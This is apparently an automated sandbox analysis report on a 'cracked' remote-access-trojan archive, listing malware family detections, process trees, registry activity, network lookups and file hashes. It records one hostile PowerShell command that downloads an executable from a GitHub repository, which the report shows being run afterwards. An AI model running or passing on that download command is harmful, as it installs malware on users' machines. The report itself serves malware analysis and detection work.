Analysis Overview
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Threat Level: Known bad
The file S500 RAT Cracked + Source .rar was found to be: Known bad.
Malicious Activity Summary
StormKitty
Async RAT payload
StormKitty payload
Asyncrat family
Agenttesla family
AgentTesla payload
AsyncRat
Arrowrat family
Stormkitty family
Contains code to disable Windows Defender
Async RAT payload
Blocklisted process makes network request
Executes dropped EXE
UPX packed file
Checks computer location settings
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Looks up geolocation information via web service
Looks up external IP address via web service
Drops desktop.ini file(s)
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies registry class
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Checks processor information in registry
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-20 17:23
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Arrowrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Asyncrat family
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win10v2004-20240226-en
Max time kernel
1287s
Max time network
1172s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E61B.tmp\E61C.tmp\E61D.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\Form4.resx
| MD5 | 0a4e049a213aef04a4b1fa145a76a752 |
| SHA1 | 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1 |
| SHA256 | 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f |
| SHA512 | 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\FormDOS.resx
| MD5 | 5c43b1a8ce131be5e8271794ec520a54 |
| SHA1 | 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a |
| SHA256 | 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153 |
| SHA512 | 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources
| MD5 | beda8bbd2a72e45431cf5dd68f7c6e61 |
| SHA1 | 18e28ada040e4c62e33d946046a9ccf66f839f0d |
| SHA256 | f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c |
| SHA512 | 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources
| MD5 | fa80841e3dc9ffb31dd5d015c1030172 |
| SHA1 | aa0d9e66db2a8528edf9931fe132f18870307216 |
| SHA256 | a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9 |
| SHA512 | a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets
| MD5 | 3d9ef7c4c2db6e7631832825418a9ba6 |
| SHA1 | b2ac00b06d61c8498914ea52eaedaab01fae1a21 |
| SHA256 | 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7 |
| SHA512 | 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props
| MD5 | 3108edc3f74d08bec485f1fc0aabab5b |
| SHA1 | e1e14322ab3e69a69a7b0c9efd5b845a112320b8 |
| SHA256 | e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584 |
| SHA512 | 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 7ba3ab7d000bd8f2206e08abdbe74d7d |
| SHA1 | 6940a66fecfed2706db0368b36a9a27f20b93e25 |
| SHA256 | 05156b19fa8699fa4aa7f59d07fb78730d5313d025c242ac4cdf591d928e97e1 |
| SHA512 | c42a3fe48e2bad222a72742028e2709a59fa0d36915c07f7332436d31b452ce358765c418fc7f0011849e10468363470f732b56b2c17029e5003b9c9ef033249 |
memory/4228-999-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 9b694ed7d344cd6f2e02977fbdc07a0a |
| SHA1 | 2bc6f78a91b26026c51051e646d788488c776855 |
| SHA256 | 2bcd8656e5e55f05143a5fd31434719e0b843567f3a7b69a392b4abb17fc63bd |
| SHA512 | 6ce0b9a9cac4b42ffd8c7f337a41e475595b051c68529e299df7519016c7b9883af10921683a919fe8ae3069740d4c96d4f645edeb0891fc4e01fc73b17a2518 |
C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oyauzrce.43f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5036-1008-0x000001DE72EC0000-0x000001DE72EE2000-memory.dmp
memory/5036-1013-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/5036-1014-0x000001DE724D0000-0x000001DE724E0000-memory.dmp
memory/5036-1015-0x000001DE724D0000-0x000001DE724E0000-memory.dmp
memory/5036-1018-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4228-1019-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\cGeoIp.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\protobuf-net.dll
| MD5 | 9fbb8cec55b2115c00c0ba386c37ce62 |
| SHA1 | e2378a1c22c35e40fd1c3e19066de4e33b50f24a |
| SHA256 | 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026 |
| SHA512 | da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04 |
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\Vestris.ResourceLib.dll
| MD5 | 944ce5123c94c66a50376e7b37e3a6a6 |
| SHA1 | a1936ac79c987a5ba47ca3d023f740401f73529b |
| SHA256 | 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a |
| SHA512 | 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
| MD5 | 7a8d11174bebefad4409d477b20825b7 |
| SHA1 | b6d0e9230fe339b4d200acbf401f66a6facd3a08 |
| SHA256 | 0760e54f54e20d7d63e5016eb204e913633ce5857d1fc722ac39977453712e3b |
| SHA512 | 2116a695a640390fdf6558c6def1900eb6edff1ac3e65030ea81ae346f1965135ab97600c4c20cb3bddc7db643e42cc74e88829bf78c9d254e7014648b88f2cb |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
| MD5 | 9e83a638e31058801b0ddeea8202760d |
| SHA1 | 9fdfafd6855469dd3f6171f7c6283d94c477e9e8 |
| SHA256 | 6f296f3c16c7aba99d3ed032a186934280bda76db96e9322bef5193d306a8df7 |
| SHA512 | 20378249a49ecb99367c715087cb2b80b1a75c198b67e0c800c458b7d2f403e85e295d00f612cf8f12b0dd6698062a761e71e2ae7477e117dce5eb394770d10c |
memory/3176-1310-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/3176-1311-0x0000023737FA0000-0x0000023739064000-memory.dmp
memory/3176-1312-0x0000023739430000-0x0000023739440000-memory.dmp
memory/3176-1314-0x00000237538D0000-0x0000023753AC4000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\Guna.UI2.dll
| MD5 | 4544872c197f9ad471bb18c648b004b0 |
| SHA1 | 280a1ec5ab002d1ab15279b3fb0de8dd3c4aa482 |
| SHA256 | bf4aec4b6a094c21008b4788be9ca7072fcff0800cf1c098828222769b311e7b |
| SHA512 | aaf6a5a357976f6a83672009d3648f4dd7303bdd91eeca6b2d1ce35f59cb65563daa70505162f862bb7ce322d9645dbabd49e9a8f8a9e22d4d169f3d59ac8aca |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.pdb
| MD5 | e90f5f88df944bd07f5e2f42a2665200 |
| SHA1 | f1f55ee3fe858e854848d4c3ccdebc9b3009f638 |
| SHA256 | e4770d767eed1e5bf31d2eeb8e543b60eeffff423515eb60a1c9329ff66ea9dc |
| SHA512 | c605c4f392cfa61e50b47c2d24c4a69d54f657e4f6c99a8da73cc0ae2d240257f4bedbcb508757e70e96f868e078e6d8969ad94fb677356fa9278279e45c82da |
memory/3176-1316-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/1536-1317-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1318-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1319-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4044-1321-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4044-1322-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
memory/4516-1323-0x0000000000400000-0x0000000000439000-memory.dmp
memory/4044-1324-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef5ef35c3059825861b16409862d0e3d |
| SHA1 | cde5311765478b1bcf309219c1a86a0238612099 |
| SHA256 | 53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b |
| SHA512 | 3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20 |
memory/1536-1339-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/4044-1338-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
memory/1536-1340-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1341-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1342-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1343-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1344-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1345-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/4044-1346-0x00000134B7590000-0x00000134B7D36000-memory.dmp
memory/4044-1349-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4516-1350-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:56
Platform
win11-20240214-en
Max time kernel
1288s
Max time network
1272s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3556 wrote to memory of 1436 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 3556 wrote to memory of 1436 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Windows\system32\NOTEPAD.EXE
